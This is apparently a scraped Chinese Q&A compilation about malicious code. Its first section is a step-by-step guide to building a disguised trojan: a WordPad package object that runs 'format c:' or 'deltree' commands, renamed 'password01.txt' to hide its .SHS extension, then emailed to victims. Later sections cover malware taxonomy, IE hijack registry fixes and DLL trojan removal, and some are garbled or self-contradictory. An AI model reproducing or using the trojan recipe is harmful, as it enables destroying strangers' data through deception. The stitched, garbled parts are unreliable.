1. 如何製作一個惡意代碼
下面我就將惡意程序的製作方法教給大家:
1.創建一個只包含一個空格(為了減小文件體積)的文本文件,任意取名。
2.打開{寫字板文檔},將此文件拖放入{寫字板文檔}。也可以點擊記{寫字板文檔}單欄中的「插入\對象」,彈出「插入對象」對話框,選中「從文件創建」,然後點擊「瀏覽」按鈕選擇要插入的文件。
3.選中該插入對象的圖標,選擇菜單欄中的「編輯\包對象\編輯包」(如圖1)。在彈出的「對象包裝程序」對話框中,選擇菜單欄中的「編輯\命令行」,然後輸入如下命令:start.exe /m format c:/q /autotest /u ,點擊「確定」,此時,內容欄中會顯示出命令內容。
4.點擊外觀欄中的「插入圖標」按鈕,會彈出一個警告對話框,確認,然後任選一個圖標。
5.選擇菜單欄中的「編輯\卷標」,為此嵌入對象取一個名稱(會替換原來的文件名稱)。點擊「文件」菜單中的「更新」,然後關閉此對話框。
6.將剛剛建立的嵌入對象拖放到桌面上。文件的默認名是「碎片」(在2000下的默認名為"片段"),現在我們把它改成「password01.txt」。打開電子郵件程序將桌面上的「password01.txt」作為附件發出,或者將含有嵌入對象(帶有惡意命令)的文檔作為附件發出。
7.當郵件接收者誤將「password01.txt.shs」文件作為「password01.txt」(如前文所述,「.SHS」擴展名永遠是隱藏的)放心地打開時,或打開文件,點擊文件中的嵌入對象時觸發惡意命令(彈出DOS運行窗口,執行格式化命令).如果將上面的命令替換為:start.exe /m deltree /y a:\*.* c:\*.* d:\*.* 則是將刪除對方硬碟下所有文件(盤符根據實際情況自定義);如果替換為:start.exe /m deltree /y c:\windows\system\*.* 則是刪除對方c:\windows\system\目錄底下的所有文件.(當然大家可以改成其它的命令)
(切記:僅供學習與研究,切莫用來攻擊他人,更不要在沒有安全准備的情況下執行上面的文件,呵呵!)
2. 什麼是惡意代碼
惡意代碼(Unwanted Code)是指沒有作用卻會帶來危險的代碼,一個最安全的定義是專把所有不必要的屬代碼都看作是惡意的,不必要代碼比惡意代碼具有更寬泛的含義,包括所有可能與某個組織安全策略相沖突的軟體。
定義一:惡意代碼又稱惡意軟體。這些軟體也可稱為廣告軟體(adware)、間諜軟體(spyware)、惡意共享軟體(malicious shareware)。是指在未明確提示用戶或未經用戶許可的情況下,在用戶計算機或其他終端上安裝運行,侵犯用戶合法權益的軟體。與病毒或蠕蟲不同,這些軟體很多不是小團體或者個人秘密地編寫和散播,反而有很多知名企業和團體涉嫌此類軟體。有時也稱作流氓軟體。
定義二:惡意代碼是指故意編制或設置的、對網路或系統會產生威脅或潛在威脅的計算機代碼。最常見的惡意代碼有計算機病毒(簡稱病毒)、特洛伊木馬(簡稱木馬)、計算機蠕蟲(簡稱蠕蟲)、後門、邏輯炸彈等。
3. 什麼是惡意代碼啊
「惡意代碼」是一種免費軟體中包含的程序模塊。它發送用戶名、IP地址、已專訪問網頁列表或已訪問標屬語信息給特定伺服器。
一般情況下,特洛伊木馬程序和後門程序是惡意的代碼,然而「惡意代碼」並非如此。但是在某種程度上,它也可作為後門程序和特洛伊木馬使用。
為了避免如此,你需要在安裝任何程序時閱讀協議許可。
1. 系統注冊用戶名
2. IP地址
3. 已安裝軟體列表
4. 已訪問地址列表
5. 點擊廣告標語
6. 已下載文件信息
7. 用戶信息when
然而只有當你使用的是合法軟體時,你才能使用「惡意代碼」。在這種情況下,你能夠利用ViRobot刪除它,並且這樣的刪除不會影響你的計算機。
但是因為是免費的,這個包含「惡意代碼」的程序,當你刪除它之後將不再運行。在你刪除「惡意代碼」之前,請備份程序。
4. 什麼是惡意代碼源程序,惡意代碼源程序有幾種
不必要代碼( Code)是指沒有作用卻會帶來危險的代碼,一個最安全的定義是把所有不必要的代碼都看作是惡意的,不必要代碼比惡意代碼具有更寬泛的含義,包括所有可能與某個組織安全策略相沖突的軟體。
一、惡意代碼的特徵
惡意代碼(Malicious code)或者叫惡意軟體Malware(Malicious Software)具有如下共同特徵:
(1) 惡意的目的
(2) 本身是程序
(3) 通過執行發生作用
有些惡作劇程序或者游戲程序不能看作是惡意代碼。對濾過性病毒的特徵進行討論的文獻很多,盡管它們數量很多,但是機理比較近似,在防病毒程序的防護范圍之內,更值得注意的是非濾過性病毒。
二、非濾過性病毒
非過濾性病毒包括口令破解軟體、嗅探器軟體、鍵盤輸入記錄軟體,遠程特洛伊和諜件等等,組織內部或者外部的攻擊者使用這些軟體來獲取口令、偵察網路通信、記錄私人通信,暗地接收和傳遞遠程主機的非授權命令,而有些私自安裝的P2P軟體實際上等於在企業的防火牆上開了一個口子。 非濾過性病毒有增長的趨勢,對它的防禦不是一個簡單的任務。與非過濾性病毒病毒有關的概念包括:
(1)諜件
諜件(Spyware)與商業產品軟體有關,有些商業軟體產品在安裝到用戶機器上的時候,未經用戶授權就通過Internet連接,讓用戶方軟體與開發商軟體進行通信,這部分通信軟體就叫做諜件。用戶只有安裝了基於主機的防火牆,通過記錄網路活動,才可能發現軟體產品與其開發商在進行定期通訊。諜件作為商用軟體包的一部分,多數是無害的,其目的多在於掃描系統,取得用戶的私有數據。
(2)遠程訪問特洛伊
遠程訪問特洛伊RAT 是安裝在受害者機器上,實現非授權的網路訪問的程序,比如NetBus 和SubSeven 可以偽裝成其他程序,迷惑用戶安裝,比如偽裝成可以執行的電子郵件,或者Web下載文件,或者游戲和賀卡等,也可以通過物理接近的方式直接安裝。
(3)Zombies
惡意代碼不都是從內部進行控制的,在分布式拒絕服務攻擊中,Internet的不少 站點受到其他主機上 zombies程序的攻擊。zombies程序可以利用網路上計算機系統的安全漏洞將自動攻擊腳本安裝到多台主機上,這些主機成為受害者而聽從攻擊者指揮,在某個時刻,匯集到一起去再去攻擊其他的受害者。
(4)破解和嗅探程序和網路漏洞掃描
口令破解、網路嗅探和網路漏洞掃描是公司內部人員偵察同事,取得非法的資源訪問許可權的主要手段,這些攻擊工具不是自動執行, 而是被隱蔽地操縱。
(5)鍵盤記錄程序
某些用戶組織使用PC活動監視軟體監視使用者的操作情況,通過鍵盤記錄,防止雇員不適當的使用資源,或者收集罪犯的證據。這種軟體也可以被攻擊者用來進行信息刺探和網路攻擊。
(6)P2P 系統.
基於Internet的點到點 (peer-to-peer)的應用程序比如 Napster、Gotomypc、AIM 和 Groove,以及遠程訪問工具通道像Gotomypc,這些程序都可以通過HTTP或者其他公共埠穿透防火牆,從而讓雇員建立起自己的VPN,這種方式對於組織或者公司有時候是十分危險的。因為這些程序首先要從內部的PC 遠程連接到外邊的Gotomypc 主機,然後用戶通過這個連接就可以訪問辦公室的PC。這種連接如果被利用,就會給組織或者企業帶來很大的危害。
(7)邏輯炸彈和時間炸彈
邏輯炸彈和時間炸彈是以破壞數據和應用程序為目的的程序。一般是由組織內部有不滿情緒的雇員植入, 邏輯炸彈和時間炸彈對於網路和系統有很大程度的破壞,Omega 工程公司的一個前網路管理員Timothy Lloyd,1996年引發了一個埋藏在原僱主計算機系統中的軟體邏輯炸彈,導致了1千萬美元的損失,而他本人最近也被判處41個月的監禁。
三、惡意代碼的傳播手法
惡意代碼編寫者一般利用三類手段來傳播惡意代碼:軟體漏洞、用戶本身或者兩者的混合。有些惡意代碼是自啟動的蠕蟲和嵌入腳本,本身就是軟體,這類惡意代碼對人的活動沒有要求。一些像特洛伊木馬、電子郵件蠕蟲等惡意代碼,利用受害者的心理操縱他們執行不安全的代碼;還有一些是哄騙用戶關閉保護措施來安裝惡意代碼。
利用商品軟體缺陷的惡意代碼有Code Red 、KaK 和BubbleBoy。它們完全依賴商業軟體產品的缺陷和弱點,比如溢出漏洞和可以在不適當的環境中執行任意代碼。像沒有打補丁的IIS軟體就有輸入緩沖區溢出方面的缺陷。利用Web 服務缺陷的攻擊代碼有Code Red、Nimda,Linux 和Solaris上的蠕蟲也利用了遠程計算機的缺陷。
惡意代碼編寫者的一種典型手法是把惡意代碼郵件偽裝成其他惡意代碼受害者的感染報警郵件,惡意代碼受害者往往是Outlook地址簿中的用戶或者是緩沖區中WEB頁的用戶,這樣做可以最大可能的吸引受害者的注意力。一些惡意代碼的作者還表現了高度的心理操縱能力,LoveLetter 就是一個突出的例子。一般用戶對來自陌生人的郵件附件越來越警惕,而惡意代碼的作者也設計一些誘餌吸引受害者的興趣。附件的使用正在和必將受到網關過濾程序的限制和阻斷,惡意代碼的編寫者也會設法繞過網關過濾程序的檢查。使用的手法可能包括採用模糊的文件類型,將公共的執行文件類型壓縮成zip文件等等。
對聊天室IRC(Internet Relay Chat)和即時消息IM(instant messaging)系統的攻擊案例不斷增加,其手法多為欺騙用戶下載和執行自動的Agent軟體,讓遠程系統用作分布式拒絕服務(DDoS)的攻擊平台,或者使用後門程序和特洛伊木馬程序控制之。
四、惡意代碼傳播的趨勢
惡意代碼的傳播具有下面的趨勢:
(1)種類更模糊
惡意代碼的傳播不單純依賴軟體漏洞或者社會工程中的某一種,而可能是它們的混合。比如蠕蟲產生寄生的文件病毒,特洛伊程序,口令竊取程序,後門程序,進一步模糊了蠕蟲、病毒和特洛伊的區別。
(2)混合傳播模式
「混合病毒威脅」和「收斂(convergent)威脅」的成為新的病毒術語,「紅色代碼」利用的是IIS的漏洞,Nimda實際上是1988年出現的Morris 蠕蟲的派生品種,它們的特點都是利用漏洞,病毒的模式從引導區方式發展為多種類病毒蠕蟲方式,所需要的時間並不是很長。
(3)多平台
多平台攻擊開始出現,有些惡意代碼對不兼容的平台都能夠有作用。來自Windows的蠕蟲可以利用Apache的漏洞,而Linux蠕蟲會派生exe格式的特洛伊。
(4) 使用銷售技術
另外一個趨勢是更多的惡意代碼使用銷售技術,其目的不僅在於利用受害者的郵箱實現最大數量的轉發,更重要的是引起受害者的興趣,讓受害者進一步對惡意文件進行操作,並且使用網路探測、電子郵件腳本嵌入和其它不使用附件的技術來達到自己的目的。
惡意軟體(malware)的製造者可能會將一些有名的攻擊方法與新的漏洞結合起來,製造出下一代的WM/Concept, 下一代的Code Red, 下一代的 Nimda。對於防病毒軟體的製造者,改變自己的方法去對付新的威脅則需要不少的時間。
(5)伺服器和客戶機同樣遭受攻擊
對於惡意代碼來說伺服器和客戶機的區別越來越模糊,客戶計算機和伺服器如果運行同樣的應用程序,也將會同樣受到惡意代碼的攻擊。象IIS服務是一個操作系統預設的服務,因此它的服務程序的缺陷是各個機器都共有的,Code Red的影響也就不限於伺服器,還會影響到眾多的個人計算機。
(6)Windows操作系統遭受的攻擊最多
Windows操作系統更容易遭受惡意代碼的攻擊,它也是病毒攻擊最集中的平台,病毒總是選擇配置不好的網路共享和服務作為進入點。其它溢出問題,包括字元串格式和堆溢出,仍然是濾過性病毒入侵的基礎。病毒和蠕蟲的攻擊點和附帶功能都是由作者來選擇的。另外一類缺陷是允許任意或者不適當的執行代碼, 隨著scriptlet.typelib 和Eyedog漏洞在聊天室的傳播,JS/Kak利用IE/Outlook的漏洞,導致兩個ActiveX控制項在信任級別執行,但是它們仍然在用戶不知道的情況下,執行非法代碼。最近的一些漏洞帖子報告說Windows Media Player可以用來旁路Outlook 2002的安全設置,執行嵌入在HTML 郵件中的JavaScript 和 ActiveX代碼。這種消息肯定會引發黑客的攻擊熱情。利用漏洞旁路一般的過濾方法是惡意代碼採用的典型手法之一。
(7)惡意代碼類型變化
此外,另外一類惡意代碼是利用MIME邊界和uuencode頭的處理薄弱的缺陷,將惡意代碼化裝成安全數據類型,欺騙客戶軟體執行不適當的代碼。
五、惡意代碼相關的幾個問題
(1)病毒防護沒有標準的方法,專家認為比較安全的方式是每個星期更新一次病毒庫,但是特殊情況下,需要更加頻繁地更新。1999年Y2K 病毒庫需要每天更新,而2000年五月,為了對付LoveLetter病毒的變種,一天就要幾次更新病毒庫。需要指出的是,有時候這種頻繁的更新對於防護效果的提高很小。
(2)用戶對於Microsoft的操作系統和應用程序抱怨很多,但是病毒防護工具本身的功能實在是應該被最多抱怨的一個因素。
(3)啟發式的病毒搜索沒有被廣泛地使用,因為清除一個病毒比調整啟發式軟體的花費要小,而被比喻成「治療比疾病本身更糟糕」。
(4)企業在防火牆管理,電子郵件管理上都花費了不小的精力,建議使用單獨的人員和工具完成這個任務。
(5) 惡意代碼攻擊方面的數據分析做得很不夠,盡管有些病毒掃描軟體有系統活動日誌,但是由於文件大小限制,不能長期保存。同時對於惡意代碼感染程度的度量和分析做得也不夠,一般的企業都不能從戰術和戰略兩個層次清晰地描述自己公司的安全問題。
(6) 病毒掃描軟體只是通知用戶改變設置,而不是自動去修改設置。
(7) 病毒防護軟體本身就有安全缺陷,容易被攻擊者利用,只是由於害怕被攻擊,病毒軟體廠商不願意談及。
(8)許多的軟體都是既可以用在安全管理,也可以用在安全突破上,問題在於意圖,比如漏洞掃描程序和嗅探程序就可以被攻擊者使用。
惡意代碼的傳播方式在迅速地演化,從引導區傳播,到某種類型文件傳播,到宏病毒傳播,到郵件傳播,到網路傳播,發作和流行的時間越來越短。Form引導區病毒1989年出現,用了一年的時間流行起來,宏病毒 Concept Macro 1995年出現,用了三個月的時間流行, LoveLetter用了大約一天,而 Code Red用了大約90分鍾, Nimda 用了不到 30分鍾. 這些數字背後的規律是很顯然的:在惡意代碼演化的每個步驟,病毒和蠕蟲從發布到流行的時間都越來越短。
惡意代碼本身也越來越直接的利用操作系統或者應用程序的漏洞, 而不僅僅依賴社會工程。伺服器和網路設施越來越多地成為攻擊目標。L10n, PoisonBOx, Code Red 和 Nimda等蠕蟲程序,利用漏洞來進行自我傳播,不再需要搭乘其他代碼
5. 惡意代碼是什麼
惡意代碼是什專么屬:
http://..com/question/8301291.html
6. 網站文件被修改添加惡意代碼 他們是怎麼做的
網站漏洞,被上傳了木馬,自動查找指定擴展名,追加<iframe 嵌入病毒網址以達到回傳播病毒目的,自己答找個asp木馬,放上去檢測下,他會告訴你如果有其他木馬,還可以批量清追加的代碼。或者把代碼全部下載下來,每個文件看看,如果木馬文件,一般代碼被加密過,全是亂碼,dreamware 批量替換嵌入代碼為空格,檢查圖片,有的圖片是假的綁定了木馬。
7. 惡意代碼是什麼
1.禁止使用電腦
現象描述:盡管網路流氓們用這一招的不多,但是一旦你中招了,後果真是不堪設想!瀏覽了含有這種惡意代碼的網頁其後果是:"關閉系統"、"運行"、"注銷"、注冊表編輯器、DOS程序、運行任何程序被禁止,系統無法進入"實模式"、驅動器被隱藏。
解決辦法:一般來說上述八大現象你都遇上了的話,基本上系統就給"廢"了,建議重裝。
2.格式化硬碟
現象描述:這類惡意代碼的特徵就是利用IE執行ActiveX的功能,讓你無意中格式化自己的硬碟。只要你瀏覽了含有它的網頁,瀏覽器就會彈出一個警告說"當前的頁面含有不安全的ctiveX,可能會對你造成危害",問你是否執行。如果你選擇"是"的話,硬碟就會被快速格式化,因為格式化時窗口是最小化的,你可能根本就沒注意,等發現時已悔之晚矣。
解決辦法:除非你知道自己是在做什麼,否則不要隨便回答"是"。該提示信息還可以被修改,如改成"Windows正在刪除本機的臨時文件,是否繼續",所以千萬要注意!此外,將計算機上Format.com、Fdisk.exe、Del.exe、Deltree.exe等命令改名也是一個辦法。
3.下載運行木馬程序
現象描述:在網頁上瀏覽也會中木馬?當然,由於IE5.0本身的漏洞,使這樣的新式入侵手法成為可能,方法就是利用了微軟的可以嵌入exe文件的eml文件的漏洞,將木馬放在eml文件里,然後用一段惡意代碼指向它。上網者瀏覽到該惡意網頁,就會在不知不覺中下載了木馬並執行,其間居然沒有任何提示和警告!
解決辦法:第一個辦法是升級您的IE5.0,IE5.0以上版本沒這毛病;此外,安裝金山毒霸、Norton等病毒防火牆,它會把網頁木馬當作病毒迅速查截殺。
4.注冊表的鎖定
現象描述:有時瀏覽了惡意網頁後系統被修改,想要用Regedit更改時,卻發現系統提示你沒有許可權運行該程序,然後讓你聯系管理員。暈了!動了我的東西還不讓改,這是哪門子的道理!
解決辦法:能夠修改注冊表的又不止Regedit一個,找一個注冊表編輯器,例如:Reghance。將注冊表中的HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System下的DWORD值"DisableRegistryTools"鍵值恢復為"0",即可恢復注冊表。
5.默認主頁修改
現象描述:一些網站為了提高自己的訪問量和做廣告宣傳,利用IE的漏洞,將訪問者的IE不由分說地進行修改。一般改掉你的起始頁和默認主頁,為了不讓你改回去,甚至將IE選項中的默認主頁按鈕變為失效的灰色。不愧是網路流氓的一慣做風。
解決辦法:1.起始頁的修改。展開注冊表到HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main,在右半部分窗口中將"Start Page"的鍵值改為"about:blank"即可。同理,展開注冊表到HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main,在右半部分窗口中將"Start Page"的鍵值改為"about:blank"即可。
注意:有時進行了以上步驟後仍然沒有生效,估計是有程序載入到了啟動項的緣故,就算修改了,下次啟動時也會自動運行程序,將上述設置改回來,解決方法如下:
運行注冊表編輯器Regedit.exe,然後依次展開HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run主鍵,然後將下面的"registry.exe"子鍵(名字不固定)刪除,最後刪除硬碟里的同名可執行程序。退出注冊編輯器,重新啟動計算機,問題就解決了。
2.默認主頁的修改。運行注冊表編輯器,展開HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\,將Default-Page-URL子鍵的鍵值中的那些惡意網站的網址改正,或者設置為IE的默認值。
3.IE選項按鈕失效。運行注冊表編輯器,將HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel中的DWORD值"Settings"=dword:1、"Links"=dword:1、"SecAddSites"=dword:1全部改為"0",將HKEY_USERS\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Control Panel下的DWORD值"homepage"的鍵值改為"0"。
6.篡改IE標題欄
現象描述:在系統默認狀態下,由應用程序本身來提供標題欄的信息。但是,有些網路流氓為了達到廣告宣傳的目的,將串值"Windows Title"下的鍵值改為其網站名或更多的廣告信息,從而達到改變IE標題欄的目的。非要別人看他的東西,而且是通過非法的修改手段,除了"無恥"兩個字,再沒有其它形容詞了。
解決辦法:展開注冊表到HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\下,在右半部分窗口找到串值"Windows Title",將該串值刪除。重新啟動計算機。
7.篡改默認搜索引擎
現象描述:在IE瀏覽器的工具欄中有一個搜索引擎的工具按鈕,可以實現網路搜索,被篡改後只要點擊那個搜索工具按鈕就會鏈接到網路注氓想要你去的網站。
解決辦法:運行注冊表編輯器,依次展開HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search\CustomizeSearch和HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search\SearchAssistant,將CustomizeSearch及SearchAssistant的鍵值改為某個搜索引擎的網址即可。
8.IE右鍵修改
現象描述:有的網路流氓為了宣傳的目的,將你的右鍵彈出的功能菜單進行了修改,並且加入了一些亂七八糟的東西,甚至為了禁止你下載,將IE窗口中單擊右鍵的功能都屏蔽掉。
解決辦法:1.右鍵菜單被修改。打開注冊表編輯器,找到HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt,刪除相關的廣告條文。
2.右鍵功能失效。打開注冊表編輯器,展開到HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions,將其DWORD值"NoBrowserContextMenu"的值改為0。
9.篡改地址欄文字
現象描述:中招者的IE地址欄下方出現一些莫名其妙的文字和圖標,地址欄里的下拉框里也有大量的地址,並不是你以前訪問過的。
解決辦法:1.地址欄下的文字。在HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\ToolBar下找到鍵值LinksFolderName,將其中的內容刪去即可。
2.地址欄中無用的地址。在HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypeURLs中刪除無用的鍵值即可。
10.啟動時彈出對話框
現象描述:1.系統啟動時彈出對話框,通常是一些廣告信息,例如歡迎訪問某某網站等等。2.開機彈出網頁,通常會彈出很多窗口,讓你措手不及,惡毒一點的,可以重復彈出窗口直到死機。
解決辦法:1.彈出對話框。打開注冊表編輯器,找到HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon主鍵,然後在右邊窗口中找到"LegalNoticeCaption"和"LegalNoticeText"這兩個字元串,刪除這兩個字元串就可以解決在啟動時出現提示框的現象了。
2.彈出網頁。點擊"開始-運行-輸入msconfig",選擇"啟動",把裡面後綴為url、html、htm的網址文件都勾掉。
11.IE窗口定時彈出
現象描述:中招者的機器每隔一段時間就彈出IE窗口,地址指向網路注氓的個人主頁。不曉得是不是網路流氓以為這樣你就會經常光顧?
解決辦法:點擊"開始-運行-輸入msconfig",選擇"啟動",把裡面後綴為hta的都勾掉,重啟。
8. 發現惡意代碼在文件 C:\WINDOWS\SYSTEM32\MHYFKPUT.DLL.
查殺dll型木馬
你可以用這個軟體到安全模式下去處理試試:
按殺毒軟體提供的路徑,記下來
1.下載一個軟體:冰刃(http://www.ttian.net/website/2005/0829/391.html)
這是一個綠色軟體,下載解壓縮後即可使用。
點擊:進程 逐個右擊右側的進程--模塊信息,仔細查看這個dll到底對哪些進程進行了插入(特別是那些系統進程),嘗試用右側的「強制解除」試試,能不能將這個dll文件從進程中解除出來(可能會碰上在某個進程中強制解除時機器會重啟的現象,如果出現這種情況,相對就麻煩了。這里就不說了)。
2.在冰刃左側的欄里通過「文件」直接定位到這個文件所在的文件夾下,找到這個文件(木馬文件一般在system32下)
3.通過按鈕「創建時間」對這個文件夾下的文件進行排序,仔細查看與這個文件在創建時間是同一天的所有文件(但是不是都是與它一樣是病毒文件,需要你判斷)。右擊它們一一刪除。
4.在開始--運行里輸入regedit打開注冊表,搜索注冊表裡這些文件的鍵值,刪除搜索到的。
5.重啟電腦,這個東西應該清除干凈了。